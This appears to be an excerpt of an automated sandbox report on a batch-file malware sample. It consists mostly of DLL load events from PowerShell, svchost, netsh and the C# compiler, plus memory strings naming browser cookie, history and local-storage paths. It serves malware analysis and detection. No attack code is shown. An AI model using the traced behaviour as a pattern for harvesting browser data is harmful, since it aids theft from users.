      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winlangdb.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47mrm.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: globinputhost.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: input.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: devobj.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: netsetupapi.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: netsetupengine.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: avicap32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvfw32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32Jump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: thegreatestexecutor.batStatic file information: File size 3533346 > 1048576
      Source: Binary string: winload_prod.pdbacroNGLLog.txt source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Temp\acrobat_sbx source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: powershell.exe, 00000022.00000002.1801242655.000000C00007A000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: powershell.exe, 00000022.00000002.1801242655.000000C000014000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdbL source: powershell.exe, 0000001F.00000002.1681630492.000002B3D8001000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ntkrnlmp.pdb source: powershell.exe, 00000022.00000002.1801242655.000000C000006000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: `C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Designer\1.0.0.20\manifest.jsonC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Travel\1.0.0.2C:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\INetCookiesC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\INetHistoryC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\RoamingStateC:\Users\user\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SystemAppDataC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetCacheC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetCookiesC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\AC\INetHistoryC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\LocalCacheC:\Users\user\AppData\Local\Packages\MicrosoftWindows.UndockedDevKit_cw5n1h2txyewy\LocalStateC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logC:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log_ source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: powershell.exe, 00000022.00000002.1806860323.000000C000280000.00000004.00001000.00020000.00000000.sdmp
      Source: Binary string: ;C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.pdb source: powershell.exe, 0000001F.00000002.1614835648.000002B3C127F000.00000004.00000800.00020000.00000000.sdmp
